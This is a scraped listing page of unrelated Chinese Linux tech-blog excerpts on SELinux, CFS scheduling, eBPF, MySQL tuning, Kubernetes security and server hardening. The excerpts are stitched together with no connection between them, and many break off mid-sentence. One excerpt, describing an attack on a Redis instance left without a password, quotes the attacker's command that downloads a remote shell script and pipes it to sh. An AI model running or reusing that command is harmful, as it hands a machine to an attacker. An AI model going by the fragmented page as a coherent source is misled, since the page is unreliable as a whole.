版权声明:欢迎交流,菲宇运维!
回到 Kernel 2.6 时代,那时候引入了一个新的安全系统,用以提供访问控制安全策略的机制。这个系统就是 Security Enhanced Linux (SELinux),它是由美国国家安全局(NSA)贡献的,它为 Linux 内核子系统引入了一个健壮的强制控制访问Mandatory Access Control架构。
从Linux 2.6.23开始,默认的调度器为CFS,即"完全公平调度器"(Completely Fair Scheduler)。CFS调度器取代了之前的"O(1)"调度器。
在Linux中,线程是由进程来实现,线程就是轻量级进程( lightweight process ),因此在Linux中,线程的调度是按照进程的调度方式来进行调度的,也就是说线程是调度单元。Linux这样实现的线程的好处的之一是:线程调度直接使用进程调度就可以了,没必要再搞一个进程内的线程调度器。在Linux中,调度器是基于线程的调度策略(scheduling policy)和静态调度优先级(static scheduling priority)来决定那个线程来运行。
巴黎 — eBPF 和使用 eBPF 构建的工具通常被视为提供可观察性、安全性或网络功能。但可以说,在许多情况下,所有这些因素都在发挥作用,因为 eBPF 从内核中钩入并扩展到跨环境运行的应用程序和基础设施中。
云豆贴心提醒,本文阅读时间7分钟 现在MySQL运行的大部分环境都是在Linux上的,如何在Linux操作系统上根据MySQL进行优化,我们这里给出一些通用简单的策略。这些方法都有助于改进MySQL的性能。 闲话少说,进入正题。 一、CPU 首先从CPU说起。 你仔细检查的话,有些服务器上会有的一个有趣的现象: 你cat /proc/cpuinfo时,会发现CPU的频率竟然跟它标称的频率不一样: 这个是Intel E5-2620的CPU,他是2.00G * 24的CPU,但是,我们发现第5颗C
上节我们介绍了“Linux安全加固10条建议”本节我们继续看Windows服务器安全加过10条建议。
Linux服务器禁ping可以通过内核参数和防火墙设置来实现。内核参数中,临时或永久设置icmp_echo_ignore_all的值即可。防火墙设置中,允许ping时添加相应规则,禁止ping时删除或注释掉相关规则。设置完成后,执行sysctl-p使新配置生效。同时,关闭防火墙或在宝塔面板打开禁ping开关也可以达到禁ping效果。
Security-Enhanced Linux (SELinux)由以下两部分组成:
[hadoop3.x系列]HDFS REST HTTP API的使用(一)WebHDFS
在上一篇文章中,我们知道,到 Linux 2.6.23 版本后,linux 实际上维护了一组调度器来实现不同的调度需要,它们被分为了四层:
SELinux带给Linux的主要价值是:提供了一个灵活的,可配置的MAC机制。
Linux 在消费电子领域的应用已经相当普遍,而对于消费电子产品而言,省电是一个重要的议题。
Linux 在消费电子领域的应用已经相当普遍,而对于消费电子产品而言,省电是一个重要的议题。 Linux 电源管理非常复杂,牵扯到系统级的待机、频率电压变换、系统空闲时的处理以及每个设备驱动对系统待机的支持和每个设备的运行时(Runtime)电源管理,可以说它和系统中的每个设备驱动都息息相关。 对于消费电子产品来说,电源管理相当重要。因此,这部分工作往往在开发周期中占据相当大的比重,下图呈现了 Linux 内核电源管理的整体架构。大体可以归纳为如下几类: 1)CPU 在运行时根据系统负载进行动态电压和频率变
Pod容器想要获取集群的资源信息,需要配置角色和ServiceAccount进行授权。为了更精细地控制Pod对资源的使用方式,Kubernetes从1.4版本开始引入了PodSecurityPolicy资源对象对Pod的安全策略进行管理。
Linux作为一个强大的开源操作系统,广泛应用于服务器、桌面、嵌入式设备等领域。然而,随着应用复杂性的增加和硬件资源的有限,Linux系统性能优化变得越来越重要。本文将从多个方面详细探讨Linux性能优化的方法和技巧,帮助读者更好地发挥系统的潜力。
【引子】周末,读了一篇同事推荐的论文《STUN: Reinforcement-Learning-Based Optimization of Kernel Scheduler Parameters for Static Workload Performance》,很有启发,遂加入个人思考编译成文。
在物理机上使用虚机搭建RAC环境时碰到了很多“坑”和关键点,这里慢慢一一回味总结下。
l DataNode异步地将内存中数据刷新到磁盘,从而减少代价较高的磁盘IO操作,这种写入称之为懒持久写入
为了更精细地控制Pod对资源的使用方式,Kubernetes从1.4版本开始引入了PodSecurityPolicy资源对象对Pod的安全策略进行管理,并在1.1版本中升级为Beta版,到1.14版本时趋于成熟。
在linux的众多发行版当中,大多数都是面向普通用户的,面向企业的屈指可数,我们通过之前的课程了解到CentOS和Red Hat Enterprise Linux出自同样的源代码,所以从可靠性,硬件兼容性,以及生命周期上来讲无疑是最好的选择,而且CentOS还是一个免费的软件,接下来我们看一下CentOS如何安装
使用admin用户登录http://cdp02.fayson.com:6080 页面,点击cm_hdfs 进入该页面
Chage是一个用于修改Linux系统用户密码更改策略的命令行工具。在本文中,我们将介绍如何在Linux系统中使用Chage命令。
change命令常用指令: -d, --lastday LAST_DAY 将上次密码更改的日期设置为LAST_DAY,设置为0时,下次登录强制修改密码 -E, --expiredate EXPIRE_DATE 将帐户到期日期设置为EXPIRE_DATE -h, --help 显示此帮助消息并退出 -I, --inactive INACTIVE 在到期后将密码设置为非活动状态 -l, --list 显示帐户信息 -m, --mindays MIN_DAYS 将密码更改前的最小天数设置为MIN_DAYS -M, --maxdays MAX_DAYS 将密码更改前的最大天数设置为MAX_DAYS -R, --root CHROOT_DIR chroot into目录 -W, --warndays WARN_DAYS 将到期警告天数设置为WARN_DAYS
我猜,你读这篇文章,说明你已经对Linux安全模块(LSM)有所了解。如果你使用过SELinux或AppArmor,其实就已经用过LSM了。甚至,在你使用的Linux发行版本或Android系统之上,也使用了LSM。
Linux进程的调度优先级数字会在好几个地方出现:内核,用户,top命令。他们各自都有自己的表示法。
对于用户账户的管理是系统管理员最重要的工作之一。尤其是,对于任何自称安全的linux系统,最受关心的应该是密码安全问题。在本教程中,我将介绍如何在linux上设置严密的密码策略。
在 Rainbond 集群中,每个团队对应于底层 Kubernetes 的一个 Namespace ,由于之前使用的底层网络无法进行 Namespace 级别的网络管理,所以在 Rainbond 同一集群下的不同团队间,所以组件可以自由的进行互相访问,用户无法对此做出任何限制,这也导致了底层网络的安全隐患一直存在。现在由 cilium 提供网络服务的 Kubernetes 集群可以很好的解决这一问题,用户可以根据自己的需求,制定针对每个团队、每个组件的网络策略,加强底层网络管理,实现网络层的安全把控。
版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/tojohnonly/article/details/71374984
作为测评机构一定会知道每年会举行“能力验证”活动,申请认可和获准认可的合格评定机构通过参加能力验证活动(包括 CNAS 组织实施或承认的能力验证计划、测评机构间比对和测量审核)证明其技术能力。之前的线上会议也表明了对测评机构能力建设方面的意见,在会议中说到机构的最高水平不代表机构的真实测评水平,因为机构派来参加能力验证的一般都是经验老道的测评师,所以表面上看起来没啥问题,真实测评中可能会存在很多问题。另外也采取了措施,比如相同人员相隔一年内无法参加能力验证,而且后续还有可能从“团队模式”的情况转化为“单人模式”。
1.使用两台Linux虚拟机和一台win10物理机。一台Linux主机作为网关(需要双网卡),另一台Linux主机作为内网,使用物理机作为外网。
在工程中遇到了Linux系统需要挂载Windows目录的需求,本文记录实现方法。 Windows 系统设置 打开SMB服务 打开 控制面板 -> 程序和功能 -> 启动SMB 1.0/CIFS文件共享支持 -> 重启计算机 📷 设置共享文件夹 需要共享的文件夹 -> 右键 属性 -> 共享 -> 共享设置 ->添加Everyone用户 -> 设置需要为该用户开放的权限 📷 配置完共享设置后可以在网络中看到自己共享的目录: 📷 此时在你的windows系统中,该目录网络路径为 \\计
KubeArmor 是一个云原生运行时安全强制系统,它在系统级别限制容器和节点的行为(如进程执行、文件访问和网络操作)。
调度器面对的情形就是这样, 其任务是在程序之间共享CPU时间, 创造并行执行的错觉, 该任务分为两个不同的部分, 其中一个涉及调度策略, 另外一个涉及上下文切换.
本文大致演示如何临时禁用SELinux,然后在CentOS 8 Linux上永久禁用它。
最近主机受到攻击,原因可能是redis集群没有设置密码(因为快过期了,不想搞得太复杂就没设),然后被人家搞事情了,就被人一把set了些执行脚本,形如curl -fsSL http://d.powerofwish.com/pm.sh | sh,真的是猥琐啊,我登上主机一看,简直是猥琐至极,不能忍了啊。
人生不是书上的故事,喜怒哀乐,悲欢离合,都在书页间,可书页翻篇何其易,人心修补何其难。——烽火戏诸侯《剑来》
1 – 记录主机信息 每当您正在使用新的Linux主机进行安全增强时,您需要创建一个文档并记录本文档中列出的项目,工作完成后,您将需要检查这些项目。另外,在开始时该文档,您需要记录有关Linux主机的信息: 设备名称 IP地址 MAC地址 负责安全提升工作的人(实际上是你) 日期 资产编号(如果您正在开展业务,则需要记录设备的资产编号) 2 – BIOS保护 您需要为此主机的BIOS设置密码,以确保最终用户无法修改或覆盖BIOS中的安全设置,这非常重要!设置BIOS管理员密码后,您需要从外部媒体设备(US
爱可生南区交付服务部团队 DBA,负责客户 MySQL 的故障处理以及公司数据库集群管理平台 DMP 的日常运维。
最近在研究Linux的短程调度(进程调度包括长程调度、中程调度和短程调度,详见参考博客1)相关的算法和调度器,由参考博客1可知,短程调度的主要任务是按照某种策略和算法将处理机分配给一个处于就绪状态的进程,分为抢占式和非抢占式。中程调度(又叫中级调度)的主要任务则是按照给定的原则和策略,将处于外存交换区中的就绪状态或等待状态的进程调入内存,或把处于内存就绪状态或内存等待状态的进程交换到外存交换区。长程调度(又叫高级调度)的主要任务则是将已进入系统并处于后备状态的作业按某种算法选择一个或一批,为其建立进程,并进入主机,装入内存;当该作业执行完毕时,负责回收系统资源。如下图所示:
在 Kubernetes 中安全地运行工作负载是很困难的,有很多配置都可能会影响到整个 Kubernetes API 的安全性,这需要我们有大量的知识积累来正确的实施。Kubernetes 在安全方面提供了一个强大的工具 securityContext,每个 Pod 和容器清单都可以使用这个属性。在本文中我们将了解各种 securityContext 的配置,探讨它们的含义,以及我们应该如何使用它们。
在Linux系统中,交换分区(Swap Space)是一个特殊的文件系统分区,它用于当物理内存(RAM)不足时,将一部分内存中的数据暂时转移到硬盘中,以便释放内存空间供系统继续使用。交换分区在Linux中起到了“虚拟内存”的作用,对于保障系统稳定运行至关重要。
在当今数字化世界中,网络安全成为了一个极其重要的话题。Linux 作为一种广泛使用的操作系统,也面临着各种网络攻击的风险,包括暴力攻击、密码破解和恶意登录等。为了保护 Linux 系统的安全,我们可以使用 Fail2ban 这样的工具来防止恶意用户的暴力攻击。
1、Linux SSH 安全策略一:关闭无关端口 网络上被攻陷的大多数主机,是黑客用扫描工具大范围进行扫描而被瞄准上的。所以,为了避免被扫描到,除了必要的端口,例如 Web、 FTP、SSH 等,其他的都应关闭。值得一提的是,我强烈建议关闭 icmp 端口,并设置规则,丢弃 icmp 包。这样别人 Ping 不到你的服务 器,威胁就自然减小大半了。丢弃 icmp 包可在 iptables 中, 加入下面这样一条: -A INPUT -p icmp -j DROP 2、Linux SSH 安全策略二:更改 S
Cloudreve是一款开源的网盘软件,支持服务器本机、腾讯云COS等多种存储方式,提供离线下载、拖拽上传、在线预览等功能,可以帮助用户快速搭建个人或多人使用的网盘系统。Lighthouse Cloudreve应用镜像集合了Cloudreve、Nginx、MariaDB、宝塔Linux面板和Aria2。省去了安装Docker和Cloudreve的步骤,鼠标点一点,五分钟将您的Lighthouse变身云盘!
之所以叫做完全公平,是因为操作系统以每个线程占用 CPU 的比率来进行动态的计算,操作系统希望每一个进程都能够平均的使用 CPU 这个资源,雨露均沾。
Linux 内核中,conntrack 的是网络栈的核心功能之一。它使得内核能够跟踪所有逻辑网络连接或者流量,因此能够鉴别构成流量的数据包,从而对每个数据流进行一致的处理。
在使用Linux的过程中,很多人和我一样经常接触iptables,但却只知道它是用来设置Linux防火墙的工具,不知道它具体是怎么工作的。今天,我们就从零开始认识一下Linux下iptables的具体工作原理。
操作系统的安全问题是信息安全领域最重要和最基本的问题之一。随着近几年国内互联网技术和行业的迅猛发展,采用Linux网络操作系统作为服务器的用户也越来越多。Linux面临着前所未有的发展机遇,同时Linux也面临着越来越多的安全隐患。作为一个开放式系统,互联网上有大量的Linux版本的开源软件产品和工具。这既方便于满足用户使用需求,也给黑客提供了更多的途径来攻击服务器,甚至盗取服务器上的机密信息。因此,详细分析Linux系统的安全机制,找出它可能存在的安全隐患,给出相应的安全策略和保护措施是十分必要的。
领取专属 10元无门槛券
手把手带您无忧上云